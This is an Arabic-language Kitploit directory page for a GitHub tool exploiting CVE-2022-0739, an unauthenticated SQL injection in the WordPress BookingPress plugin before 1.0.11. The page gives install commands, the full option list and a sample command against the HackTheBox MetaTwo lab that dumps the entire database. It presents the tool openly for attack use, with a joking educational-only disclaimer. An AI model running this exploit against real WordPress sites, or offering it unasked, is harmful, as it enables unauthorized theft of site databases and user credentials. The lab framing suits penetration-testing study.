Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-0739 — استغلال لـ WP BookingPress (< 1.0.11) مبني على destr4ct POC. | Kitploit
أدوات/GitHubGitHub/viardant/cve-2022-0739
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubviardant/cve-2022-0739

CVE-2022-0739

استغلال لـ WP BookingPress (< 1.0.11) مبني على destr4ct POC.

عرض المستودع
4منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2022-0739

محاولتي لاستغلال CVE-2022-0739 في BookingPress، بناءً على إثبات المفهوم (POC) لـ destr4ct - لكن بشكل أفضل.

مثال

مثال استخدام ضد جهاز MetaTwo من HackTheBox، الذي يستضيف ووردبريس مع إضافة bookingpress الضعيفة (الإصدار 1.0.10).

root@kitploit:~
python booking-sqlinjector.py -u http://metapress.htb -nu http://metapress.htb/events/ -a -o db_dump

asciicast

الاستخدام

root@kitploit:~
usage: booking-sqlinjector.py [-h] -u URL [-o BASENAME] [-p PAYLOAD] [-a] [-v] (-n NONCE | -nu NONCE_URL)

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     URL of WordPress server with vulnerable plugin (http://example.domain)
  -o BASENAME, --out BASENAME
                        Output database schema and dump in JSON format
  -p PAYLOAD, --payload PAYLOAD
                        Payload to inject. Should start with ')'
  -a, --dump-all        Enables whole DB dump
  -v, --verbose         Enables verbose mode
  -n NONCE, --nonce NONCE
                        Nonce that you got as unauthenticated user
  -nu NONCE_URL, --nonce-url NONCE_URL
                        URL where nonce can be extracted (bookingprss form page)

التثبيت

root@kitploit:~
git clone https://github.com/viardant/CVE-2022-0739
cd CVE-2022-0739
pip install -r requirements.txt

إخلاء المسؤولية

TL:DR؛ لأغراض تعليمية فقط، لا تخرب أشياء لا تملكها أو ليس لديك إذن باختبارها. إذا استخدمت هذا البرنامج لأي غرض خبيث، فقد يصيب آلهة الأمن السيبراني حاسوبك ببرمجية خبيثة مدمرة لدرجة أنك ستتمنى لو اشتريت Mac.

تنزيل الأداة